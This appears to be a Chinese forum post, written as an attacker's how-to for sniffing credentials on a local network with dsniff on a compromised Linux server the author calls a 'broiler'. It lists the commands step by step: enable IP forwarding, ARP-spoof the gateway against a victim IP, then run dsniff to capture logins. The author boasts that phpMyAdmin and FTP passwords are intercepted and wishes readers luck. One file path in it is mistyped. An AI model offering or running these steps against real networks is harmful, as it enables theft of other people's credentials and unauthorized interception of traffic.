这些天闲来无事严究了一下LINUX下的嗅探工具听说dsniff这个工具比较强于是就拿它下手了
攻击的机器是一台肉鸡,是一台LINUX服务器,版本FC3,说实话这个工具安装真是麻烦,用了好久才装上,以下是该包的地址:http://www.xfocus.net/tools/200103/75.html
安装就不说了,只是另外要注意的是安装之前请确认你已经安装了libnet libnids等包。
在网上找了许多的资料都是讲怎么安装的,而且资料少的可怜,我也是硬着头皮看了几个老外站才有了一点眉目,国内竟然没有什么相关的文章,很生气。
arpspoof 和dsniff必须配合才可以成功截获同网关内的‘数据包’!
例
你想攻击192.168.1.222这台机器首先执行以下操做
其一,首先打开本机的路由转发功能
操作:echo "1" > /proc/sys/net/ipv4/ip_forward
第二:
#arpspoof -t 网关的IP 受攻击者的IP
第三:打开另一个终端执行
#dsniff -c -f /usr/loca/lib/dsniff.service
到现在这个份上基本上它已经可以工作了
你可以在本机上试验一下
例如我通过phpmyadmin 登陆的时候密码也会成功被截获
FTP的更是一个逃不了,注大家好运
WINS平台的就不多说了,一像是傻瓜似的,不过路由转发的东西需要下WinPcap.exe
这个东东,别忘了重起CP。
